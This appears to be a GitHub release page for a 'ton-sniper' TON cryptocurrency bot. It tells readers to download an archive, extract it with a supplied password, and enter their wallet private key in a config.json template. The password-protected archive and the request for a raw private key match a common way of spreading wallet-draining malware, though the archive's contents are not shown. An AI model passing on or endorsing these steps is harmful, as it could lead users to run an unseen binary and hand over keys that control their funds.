Skip to content

Releases: sui-sensei/ton-sniper

Release

05 Jul 16:17
21538c6
Compare
Choose a tag to compare
  • Download the repository.
  • extract archive with pass Mn14qIl.
  • Create a config.json file in the root directory of your project and specify your environment variables there. You can utilize the config.json that has been provided.
  • run the bot.

Config.json

{
  "NodeUrl": "https://main.ton.dev",
  "PrivateKey": "your_private_key",
  "TargetAddress": "target_address",
  "TargetAmount": 1000
}